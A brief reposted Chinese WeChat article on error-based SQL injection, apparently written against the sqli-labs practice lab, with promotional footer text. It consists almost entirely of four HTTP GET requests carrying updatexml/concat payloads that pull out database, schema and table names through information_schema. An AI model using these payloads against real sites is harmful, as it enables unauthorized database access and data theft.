GET /sqli/Less-2/?id=1' HTTP/1.1
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,database(),0x7e),0))--+ HTTP/1.1
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,(select+schema_name+from+information_schema.schemata+limit+4,1),0x7e),1))--+ HTTP/1.1
GET /sqli/Less-2/?id=-1+and+(updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema='security'+limit+3,1),0x7e),1))--+ HTTP/1.1
关 注 有 礼
欢迎关注公众号:小酒馆文案
获取包邮送书抽奖码
原文始发于微信公众号(Web安全工具库):Sql注入 -- 报错注入攻击
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论